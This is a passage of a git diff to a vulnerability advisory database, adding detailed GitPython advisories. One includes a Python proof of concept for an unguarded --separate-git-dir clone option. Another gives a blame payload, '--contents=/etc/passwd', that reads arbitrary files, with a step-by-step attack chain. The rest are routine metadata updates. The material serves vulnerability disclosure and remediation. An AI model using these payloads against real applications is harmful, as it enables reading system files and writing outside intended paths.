present.\n\n## Evidence\n- `git/repo/base.py:145-151` — `unsafe_git_init_options` includes `\"--separate-git-dir\"` with the comment \"Redirects the repository metadata to a caller-controlled path\".\n- `git/repo/base.py:153-165` — `unsafe_git_clone_options` (the list actually enforced on `_clone`) does **not** include `\"--separate-git-dir\"`.\n- `git/repo/base.py:1450-1452` — docstring of `clone_from`/`clone` explicitly documents `--separate-git-dir` as one of the options `allow_unsafe_options` is supposed to gate.\n- `git/repo/base.py:1495-1518` — `_clone()` special-cases `separate_git_dir` only to `Git.polish_url()` it (path normalization for URL-like values), then runs it through `Git.check_unsafe_options(options=..., unsafe_options=cls.unsafe_git_clone_options)` — which, per the list above, does not flag it.\n- PoC (`gitpython-001-poc.py`, embedded below) run against this exact checkout confirms the option reaches the real `git clone` subprocess unguarded and creates a full git directory outside the destination path, with `allow_unsafe_options` at its default `False`.\n\n## False-positive check (adversarial re-read)\n- **Is there a value-level check that would still stop this?** No — `check_unsafe_options` only inspects option *names* (via `_canonicalize_option_name`) against the denylist; it performs no filesystem/path validation on `separate_git_dir`'s value, and no other guard in `_clone()` touches this kwarg besides the `Git.polish_url()` normalization (which does not reject arbitrary paths).\n- **Is `--separate-git-dir` perhaps a no-op or safely sandboxed for `clone` specifically (unlike `init`)?** No — confirmed empirically: the option reaches the real `git` binary unmodified and git honors it exactly as documented, writing the full metadata tree to the given path.\n- **Could this be the exact bug already covered by one of the 26 published GHSAs?** Checked all 26 entries in `_known-advisories.json` (Filter 0): `GHSA-9rj7-rf2p-w77r` covers `--template` in `Repo.init`; `GHSA-6p8h-3wgx-97gf` covers `--template` in clone (already fixed, present in `unsafe_git_clone_options`); `GHSA-hmq2-w58f-27jc` covers arbitrary repo creation via unvalidated **`.gitmodules` submodule names** (a different code path — `Submodule`, not `Repo.clone_from()` kwargs). None reference `--separate-git-dir` on the clone path. This is a distinct, currently-unpatched gap.\n- **Does this require an unrealistic precondition?** The precondition (host app forwards a kwarg into `clone_from`/`clone`) is identical to the precondition already accepted by the maintainers for the sibling entries in the same list (`--template`, `--upload-pack`, `--config`, `--bundle-uri`) — i.e. it is the same threat model the guard exists to cover, just missing one entry.\n- Verdict: no concrete blocker found. **CONFIRMED.**\n\n## Remediation\nAdd `\"--separate-git-dir\"` (and its `-` alias if git ever adds one — currently there is none) to `Repo.unsafe_git_clone_options` in `git/repo/base.py`, matching `unsafe_git_init_options`. Since `Repo._clone()` already special-cases `separate_git_dir` for `Git.polish_url()` normalization, the fix is a one-line addition to the existing list, consistent with how `GHSA-6p8h-3wgx-97gf` added `--template` to the same list.\n\n## Confidence\nHigh. Root cause is a one-line, unambiguous omission the maintainers' own docstring contradicts; PoC reproduces cleanly and deterministically against the current HEAD; no plausible false-positive path found.\n\n\n## Proof-of-Concept source (`gitpython-001-poc.py`)\n\n```python\n#!/usr/bin/env python3\n\"\"\"\nGITPYTHON-001 PoC: Repo.clone_from(separate_git_dir=...) is not in\nunsafe_git_clone_options, so it reaches `git clone` unguarded and writes a\nfull git directory (config, hooks/, objects/, refs/, ...) to an\nattacker-controlled path OUTSIDE the intended destination directory, with\nallow_unsafe_options left at its default of False.\n\nRun against the GitPython source tree under test, e.g.:\n PYTHONPATH=\":/gitdb:/smmap\" python3 gitpython-001-poc.py \n\nBenign: only writes/reads inside the given workdir. No destructive/exfiltrating\npayload. Exits non-zero and prints \"NOT VULNERABLE\" if the guard blocks the option\nor the write does not escape the destination directory.\n\"\"\"\nimport os\nimport sys\nimport subprocess\n\n\ndef main():\n workdir = sys.argv[1] if len(sys.argv) > 1 else \"/tmp/gitpython-001-poc\"\n src = os.path.join(workdir, \"src\")\n dest = os.path.join(workdir, \"dest\")\n sentinel_dir = os.path.join(workdir, \"OUTSIDE_SENTINEL\")\n target_gitdir = os.path.join(sentinel_dir, \"redirected.git\")\n\n for p in (src, dest, sentinel_dir):\n os.makedirs(p, exist_ok=True)\n\n # Minimal benign source repo to clone from.\n subprocess.run([\"git\", \"init\", \"-q\", \"-b\", \"main\", src], check=True)\n subprocess.run([\"git\", \"-C\", src, \"config\", \"user.email\", \"test@example.com\"], check=True)\n subprocess.run([\"git\", \"-C\", src, \"config\", \"user.name\", \"Test\"], check=True)\n with open(os.path.join(src, \"file.txt\"), \"w\") as f:\n f.write(\"hello\\n\")\n subprocess.run([\"git\", \"-C\", src, \"add\", \"file.txt\"], check=True)\n subprocess.run([\"git\", \"-C\", src, \"commit\", \"-q\", \"-m\", \"init\"], check=True)\n\n import git # gitpython under test\n\n print(\"unsafe_git_clone_options =\", git.Repo.unsafe_git_clone_options)\n assert \"--separate-git-dir\" not in git.Repo.unsafe_git_clone_options, (\n \"guard now includes --separate-git-dir; PoC no longer applicable, target patched\"\n )\n\n try:\n repo = git.Repo.clone_from(src, dest, separate_git_dir=target_gitdir)\n except git.exc.UnsafeOptionError as e:\n print(\"NOT VULNERABLE: blocked by UnsafeOptionError:\", e)\n sys.exit(1)\n\n wrote_outside = os.path.isdir(os.path.join(target_gitdir, \"hooks\")) and os.path.isfile(\n os.path.join(target_gitdir, \"config\")\n )\n gitlink_points_outside = False\n with open(os.path.join(dest, \".git\")) as f:\n gitlink = f.read().strip()\n gitlink_points_outside = target_gitdir in gitlink\n\n print(\"repo.git_dir =\", repo.git_dir)\n print(\"wrote git directory outside dest (sentinel) =\", wrote_outside)\n print(\"dest/.git gitlink points outside dest =\", gitlink_points_outside)\n\n if wrote_outside and gitlink_points_outside:\n print(\"VULNERABLE: git directory created at attacker-controlled path \"\n f\"outside the clone destination: {target_gitdir}\")\n sys.exit(0)\n else:\n print(\"NOT VULNERABLE: sentinel not observed\")\n sys.exit(1)\n\n\nif __name__ == \"__main__\":\n main()\n\n```", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + }, { "type": "CVSS_V4", - "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" } ], "references": [ + { + "type": "WEB", + "url": "https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-8mcc-hrx5-hvxc" + }, { "type": "ADVISORY", - "url": "https://www.vulncheck.com/advisories/gitpython-before-path-traversal-via-separate-git-dir" + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-78677" }, { - "type": "EVIDENCE", - "url": "https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-8mcc-hrx5-hvxc" + "type": "WEB", + "url": "https://github.com/gitpython-developers/GitPython/pull/2210" + }, + { + "type": "WEB", + "url": "https://github.com/gitpython-developers/GitPython/commit/b68afff45af0f49e79a3e2d2162018986b37ad5d" + }, + { + "type": "PACKAGE", + "url": "https://github.com/gitpython-developers/GitPython" + }, + { + "type": "WEB", + "url": "https://github.com/gitpython-developers/GitPython/releases/tag/3.1.59" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/advisory-database/tree/main/vulns/gitpython/PYSEC-2026-3787.yaml" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/gitpython-before-path-traversal-via-separate-git-dir" } ] } diff --git a/advisories/BREW-legit-CVE-2026-78678.json b/advisories/BREW-legit-CVE-2026-78678.json index dbf70d7a974..9a7515e3214 100644 --- a/advisories/BREW-legit-CVE-2026-78678.json +++ b/advisories/BREW-legit-CVE-2026-78678.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-legit-CVE-2026-78678", "published": "2026-09-04T09:19:02Z", - "modified": "2026-09-05T09:12:41Z", + "modified": "2026-09-10T19:41:30Z", "upstream": [ "PYSEC-2026-3788", "CVE-2026-78678", @@ -52,21 +52,34 @@ } ] }, - "details": "GitPython versions before 3.1.59 contain an incomplete denylist in the unsafe_git_revision_options guard that omits --contents and -S options, allowing attackers to read arbitrary files by passing these options to Repo.blame(). Attackers can supply revision values like --contents=/etc/passwd to leak file contents through the blame result returned to the caller.", + "summary": "GitPython: Incomplete unsafe_git_revision_options denylist omits --contents/-S, enabling arbitrary file read via Repo.blame()", + "details": "## Summary\n`Repo.blame()` / `Repo.blame_incremental()` guard forwarded revision options against `unsafe_git_revision_options`, but that denylist only contains the file-WRITE options `--output`/`-o`. `git blame` also honors `--contents ` and `-S `, which cause the file's lines to be echoed into the blame result — an arbitrary file READ. Neither option is in the denylist, so a caller-influenced revision value of `--contents=` passes the guard and leaks file contents. This is a distinct sink-option and impact class (READ) from GHSA-956x-8gvw-wg5v (which addressed the blame `--output` WRITE), directly analogous to GHSA-539m-9xh6-q6rr (archive READ gap accepted separately from the archive write/exec advisory).\n\n## Root Cause\n`unsafe_git_revision_options = [\"--output\",\"-o\"]` (`git/repo/base.py:188`). The `rev` string is passed to `_option_candidates([rev], kwargs)` and placed BEFORE the `--` separator (base.py:841). The canonical name of `--contents=...` is `contents`, which is not on the denylist, so no `UnsafeOptionError` is raised. The trailing `--` protects only the pathspec, not the option before the revision.\n\n## Impact\nArbitrary local file read at the privileges of the host process; the file's line contents appear in the blame result returned to the caller. Pure VALUE control (the caller forwards a user-influenced revision string). Default `allow_unsafe_options=False`.\n\n## Proof of Concept\n```python\nresult = repo.blame(\"--contents=/etc/passwd\", \"a.txt\")\n# result rows carry the victim file's line text\n```\n\n## Attack Chain\n1. Entry: app calls `repo.blame(rev, file)` with attacker `rev=\"--contents=/etc/passwd\"` (or kwarg `contents=\"/etc/passwd\"`, or `-S`).\n2. Check: `Git.check_unsafe_options(_option_candidates([rev,...], kwargs), unsafe_git_revision_options)` @ base.py:841. Guard: denylist = `[\"--output\",\"-o\"]` only. Bypass proof: canonical name `contents` ∉ denylist → no error.\n3. Sink: `self.git.blame(rev, \"--\", file, p=True, ...)`. argv (observed): `['git','blame','-p','--contents=','HEAD','--','a.txt']`.\n4. Impact: blame result rows carry the victim file's line text.\n\n## Bypass Evidence\nIndependently reproduced (independent test harness, default `allow_unsafe_options=False`): `blame('--contents=','a.txt')` → guard PASSED; result rows = `['GATE_SECRET_LINE_A','GATE_SECRET_LINE_B']`. Control: `blame('--output=…')` still BLOCKED (guard active on this path). `-S` kwarg argv also reaches git unguarded.\n\n## Affected Versions\n`GitPython <= 3.1.58` (denylist present verbatim on the latest release tag).\n\n## Suggested Fix\nPrefer an allowlist of blame options; at minimum add `--contents`/`-S` (and any other path-taking blame options) to `unsafe_git_revision_options`, and make the membership rule \"the option takes a filesystem path\" rather than \"the option writes output\".\n\n---\nReported by **zx (Jace)** — GitHub: @manus-use", "severity": [ { - "type": "CVSS_V4", - "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" } ], "references": [ + { + "type": "WEB", + "url": "https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-5xxx-qhh7-9287" + }, { "type": "ADVISORY", - "url": "https://www.vulncheck.com/advisories/gitpython-before-arbitrary-file-read-via-repo-blame" + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-78678" }, { - "type": "EVIDENCE", - "url": "https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-5xxx-qhh7-9287" + "type": "PACKAGE", + "url": "https://github.com/gitpython-developers/GitPython" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/advisory-database/tree/main/vulns/gitpython/PYSEC-2026-3788.yaml" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/gitpython-before-arbitrary-file-read-via-repo-blame" } ] } diff --git a/advisories/BREW-octodns-CVE-2017-18342.json b/advisories/BREW-octodns-CVE-2017-18342.json index 48c38895b59..011efb5115c 100644 --- a/advisories/BREW-octodns-CVE-2017-18342.json +++ b/advisories/BREW-octodns-CVE-2017-18342.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-octodns-CVE-2017-18342", "published": "2026-08-13T17:19:23Z", - "modified": "2026-08-13T17:19:23Z", + "modified": "2026-09-10T20:07:43Z", "upstream": [ "GHSA-rprw-h62v-c2w7", "CVE-2017-18342", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyyaml", - "subject_version": "6.0.3", - "key": "pkg:pypi/pyyaml@6.0.3", - "resource": "pyyaml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-octodns-CVE-2019-20477.json b/advisories/BREW-octodns-CVE-2019-20477.json index 92df278b6b3..16c4824f1e8 100644 --- a/advisories/BREW-octodns-CVE-2019-20477.json +++ b/advisories/BREW-octodns-CVE-2019-20477.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-octodns-CVE-2019-20477", "published": "2026-08-13T17:19:23Z", - "modified": "2026-08-13T17:19:23Z", + "modified": "2026-09-10T20:07:43Z", "upstream": [ "GHSA-3pqx-4fqf-j49f", "CVE-2019-20477", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyyaml", - "subject_version": "6.0.3", - "key": "pkg:pypi/pyyaml@6.0.3", - "resource": "pyyaml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-octodns-CVE-2020-14343.json b/advisories/BREW-octodns-CVE-2020-14343.json index b7ef5cf5c7a..eb83f321fda 100644 --- a/advisories/BREW-octodns-CVE-2020-14343.json +++ b/advisories/BREW-octodns-CVE-2020-14343.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-octodns-CVE-2020-14343", "published": "2026-08-13T17:19:23Z", - "modified": "2026-08-13T17:19:23Z", + "modified": "2026-09-10T20:07:43Z", "upstream": [ "GHSA-8q59-q68h-6hv4", "CVE-2020-14343", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyyaml", - "subject_version": "6.0.3", - "key": "pkg:pypi/pyyaml@6.0.3", - "resource": "pyyaml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-octodns-CVE-2020-1747.json b/advisories/BREW-octodns-CVE-2020-1747.json index a2176726436..1912b88d832 100644 --- a/advisories/BREW-octodns-CVE-2020-1747.json +++ b/advisories/BREW-octodns-CVE-2020-1747.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-octodns-CVE-2020-1747", "published": "2026-08-13T17:19:23Z", - "modified": "2026-08-13T17:19:23Z", + "modified": "2026-09-10T20:07:43Z", "upstream": [ "GHSA-6757-jp84-gxfx", "CVE-2020-1747", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyyaml", - "subject_version": "6.0.3", - "key": "pkg:pypi/pyyaml@6.0.3", - "resource": "pyyaml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-octodns-CVE-2023-29483.json b/advisories/BREW-octodns-CVE-2023-29483.json index d89d0c65947..7dc0647ff86 100644 --- a/advisories/BREW-octodns-CVE-2023-29483.json +++ b/advisories/BREW-octodns-CVE-2023-29483.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-octodns-CVE-2023-29483", "published": "2026-08-13T17:19:23Z", - "modified": "2026-08-13T17:19:23Z", + "modified": "2026-09-10T20:07:43Z", "upstream": [ "GHSA-3rq5-2g8h-59hc", "CVE-2023-29483", @@ -43,14 +43,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "dnspython", - "subject_version": "2.8.0", - "key": "pkg:pypi/dnspython@2.8.0", - "resource": "dnspython" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-octodns-CVE-2024-3651.json b/advisories/BREW-octodns-CVE-2024-3651.json index e6b17bc45ac..ad706d4f418 100644 --- a/advisories/BREW-octodns-CVE-2024-3651.json +++ b/advisories/BREW-octodns-CVE-2024-3651.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-octodns-CVE-2024-3651", "published": "2026-08-13T17:19:23Z", - "modified": "2026-08-13T17:19:23Z", + "modified": "2026-09-10T20:07:43Z", "upstream": [ "GHSA-jjg7-2v4v-x38h", "CVE-2024-3651", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "idna", - "subject_version": "3.18", - "key": "pkg:pypi/idna@3.18", - "resource": "idna" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-octodns-CVE-2026-45409.json b/advisories/BREW-octodns-CVE-2026-45409.json index 9edd1e4068f..690783dc1df 100644 --- a/advisories/BREW-octodns-CVE-2026-45409.json +++ b/advisories/BREW-octodns-CVE-2026-45409.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-octodns-CVE-2026-45409", "published": "2026-08-13T17:19:23Z", - "modified": "2026-08-13T17:19:23Z", + "modified": "2026-09-10T20:07:43Z", "upstream": [ "GHSA-65pc-fj4g-8rjx", "CVE-2026-45409", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "idna", - "subject_version": "3.18", - "key": "pkg:pypi/idna@3.18", - "resource": "idna" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-offlineimap-CVE-2012-4571.json b/advisories/BREW-offlineimap-CVE-2012-4571.json index 7cc8772a084..e1c68d56cc3 100644 --- a/advisories/BREW-offlineimap-CVE-2012-4571.json +++ b/advisories/BREW-offlineimap-CVE-2012-4571.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-offlineimap-CVE-2012-4571", "published": "2026-08-13T17:19:23Z", - "modified": "2026-08-13T17:19:23Z", + "modified": "2026-09-10T20:07:43Z", "upstream": [ "GHSA-p3h7-3c45-qj4v", "CVE-2012-4571", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "keyring", - "subject_version": "25.7.0", - "key": "pkg:pypi/keyring@25.7.0", - "resource": "keyring" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-offlineimap-CVE-2012-5577.json b/advisories/BREW-offlineimap-CVE-2012-5577.json index 6dceed98af5..94c13bde745 100644 --- a/advisories/BREW-offlineimap-CVE-2012-5577.json +++ b/advisories/BREW-offlineimap-CVE-2012-5577.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-offlineimap-CVE-2012-5577", "published": "2026-08-13T17:19:23Z", - "modified": "2026-08-13T17:19:23Z", + "modified": "2026-09-10T20:07:43Z", "upstream": [ "GHSA-p86x-652p-6385", "CVE-2012-5577", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "keyring", - "subject_version": "25.7.0", - "key": "pkg:pypi/keyring@25.7.0", - "resource": "keyring" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-offlineimap-CVE-2012-5578.json b/advisories/BREW-offlineimap-CVE-2012-5578.json index 22c541b0da9..65074dc27ff 100644 --- a/advisories/BREW-offlineimap-CVE-2012-5578.json +++ b/advisories/BREW-offlineimap-CVE-2012-5578.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-offlineimap-CVE-2012-5578", "published": "2026-08-13T17:19:23Z", - "modified": "2026-08-13T17:19:23Z", + "modified": "2026-09-10T20:07:43Z", "upstream": [ "GHSA-8867-vpm3-g98g", "CVE-2012-5578", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "keyring", - "subject_version": "25.7.0", - "key": "pkg:pypi/keyring@25.7.0", - "resource": "keyring" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-offlineimap-CVE-2026-23949.json b/advisories/BREW-offlineimap-CVE-2026-23949.json index 2a96f0f4eaf..79bf1d2a6e5 100644 --- a/advisories/BREW-offlineimap-CVE-2026-23949.json +++ b/advisories/BREW-offlineimap-CVE-2026-23949.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-offlineimap-CVE-2026-23949", "published": "2026-08-13T17:19:23Z", - "modified": "2026-08-13T17:19:23Z", + "modified": "2026-09-10T20:07:43Z", "upstream": [ "GHSA-58pv-8j8x-9vj2", "CVE-2026-23949", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "jaraco-context", - "subject_version": "6.1.2", - "key": "pkg:pypi/jaraco-context@6.1.2", - "resource": "jaraco-context" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-papis-CVE-2014-1829.json b/advisories/BREW-papis-CVE-2014-1829.json index ee83ed82f45..51fa3f48714 100644 --- a/advisories/BREW-papis-CVE-2014-1829.json +++ b/advisories/BREW-papis-CVE-2014-1829.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-papis-CVE-2014-1829", "published": "2026-08-13T17:25:32Z", - "modified": "2026-08-20T09:31:14Z", + "modified": "2026-09-10T20:21:27Z", "upstream": [ "GHSA-cfj3-7x9c-4p3h", "CVE-2014-1829", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-papis-CVE-2014-1830.json b/advisories/BREW-papis-CVE-2014-1830.json index 0a977a74a74..832f70dabd2 100644 --- a/advisories/BREW-papis-CVE-2014-1830.json +++ b/advisories/BREW-papis-CVE-2014-1830.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-papis-CVE-2014-1830", "published": "2026-08-13T17:25:32Z", - "modified": "2026-08-20T09:31:14Z", + "modified": "2026-09-10T20:21:27Z", "upstream": [ "GHSA-652x-xj99-gmcc", "CVE-2014-1830", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-papis-CVE-2014-3146.json b/advisories/BREW-papis-CVE-2014-3146.json index e353bd07f65..73d62f3ad5b 100644 --- a/advisories/BREW-papis-CVE-2014-3146.json +++ b/advisories/BREW-papis-CVE-2014-3146.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-papis-CVE-2014-3146", "published": "2026-08-13T17:25:32Z", - "modified": "2026-08-13T17:25:32Z", + "modified": "2026-09-10T20:21:27Z", "upstream": [ "GHSA-57qw-cc2g-pv5p", "CVE-2014-3146", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "3.3.5", "resource": "lxml", - "resource_purl": "pkg:pypi/lxml@6.1.1" + "resource_purl": "pkg:pypi/lxml@6.1.3" } } ], @@ -46,16 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "lxml", - "subject_version": "6.1.1", - "key": "pkg:pypi/lxml@6.1.1", - "resource": "lxml" - }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "lxml", - "subject_version": "6.1.1", - "key": "pkg:pypi/lxml@6.1.1", + "subject_version": "6.1.3", + "key": "pkg:pypi/lxml@6.1.3", "resource": "lxml" } ] diff --git a/advisories/BREW-papis-CVE-2015-2296.json b/advisories/BREW-papis-CVE-2015-2296.json index f6bf08055fb..8dadfeb942f 100644 --- a/advisories/BREW-papis-CVE-2015-2296.json +++ b/advisories/BREW-papis-CVE-2015-2296.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-papis-CVE-2015-2296", "published": "2026-08-13T17:25:32Z", - "modified": "2026-08-20T09:31:14Z", + "modified": "2026-09-10T20:21:27Z", "upstream": [ "GHSA-pg2w-x9wp-vw92", "CVE-2015-2296", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-papis-CVE-2015-8557.json b/advisories/BREW-papis-CVE-2015-8557.json index 1c152abc8b7..71bfe4fc98c 100644 --- a/advisories/BREW-papis-CVE-2015-8557.json +++ b/advisories/BREW-papis-CVE-2015-8557.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-papis-CVE-2015-8557", "published": "2026-08-13T17:25:32Z", - "modified": "2026-08-20T09:31:14Z", + "modified": "2026-09-10T20:21:27Z", "upstream": [ "GHSA-fff8-4w9p-7v76", "CVE-2015-8557", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pygments", - "subject_version": "2.21.0", - "key": "pkg:pypi/pygments@2.21.0", - "resource": "pygments" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-papis-CVE-2016-10075.json b/advisories/BREW-papis-CVE-2016-10075.json index e0c1a2bfd71..746cb082f5b 100644 --- a/advisories/BREW-papis-CVE-2016-10075.json +++ b/advisories/BREW-papis-CVE-2016-10075.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-papis-CVE-2016-10075", "published": "2026-08-13T17:25:32Z", - "modified": "2026-08-20T09:31:14Z", + "modified": "2026-09-10T20:21:27Z", "upstream": [ "GHSA-r7q7-xcjw-qx8q", "CVE-2016-10075", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "tqdm", - "subject_version": "4.70.0", - "key": "pkg:pypi/tqdm@4.70.0", - "resource": "tqdm" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-papis-CVE-2016-9015.json b/advisories/BREW-papis-CVE-2016-9015.json index 25ad23885f2..c8dbfe9eaaf 100644 --- a/advisories/BREW-papis-CVE-2016-9015.json +++ b/advisories/BREW-papis-CVE-2016-9015.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-papis-CVE-2016-9015", "published": "2026-08-13T17:25:32Z", - "modified": "2026-08-13T17:25:32Z", + "modified": "2026-09-10T20:21:27Z", "upstream": [ "GHSA-v4w5-p2hg-8fh6", "CVE-2016-9015", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-papis-CVE-2017-18342.json b/advisories/BREW-papis-CVE-2017-18342.json index 5b54fc25d6e..9424a8ceec7 100644 --- a/advisories/BREW-papis-CVE-2017-18342.json +++ b/advisories/BREW-papis-CVE-2017-18342.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-papis-CVE-2017-18342", "published": "2026-08-13T17:25:32Z", - "modified": "2026-08-13T17:25:32Z", + "modified": "2026-09-10T20:21:27Z", "upstream": [ "GHSA-rprw-h62v-c2w7", "CVE-2017-18342", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyyaml", - "subject_version": "6.0.3", - "key": "pkg:pypi/pyyaml@6.0.3", - "resource": "pyyaml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-papis-CVE-2018-18074.json b/advisories/BREW-papis-CVE-2018-18074.json index 2bd14c56556..298a3fbbd94 100644 --- a/advisories/BREW-papis-CVE-2018-18074.json +++ b/advisories/BREW-papis-CVE-2018-18074.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-papis-CVE-2018-18074", "published": "2026-08-13T17:25:32Z", - "modified": "2026-08-20T09:31:14Z", + "modified": "2026-09-10T20:21:27Z", "upstream": [ "GHSA-x84v-xcm2-53pg", "CVE-2018-18074", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-papis-CVE-2018-19787.json 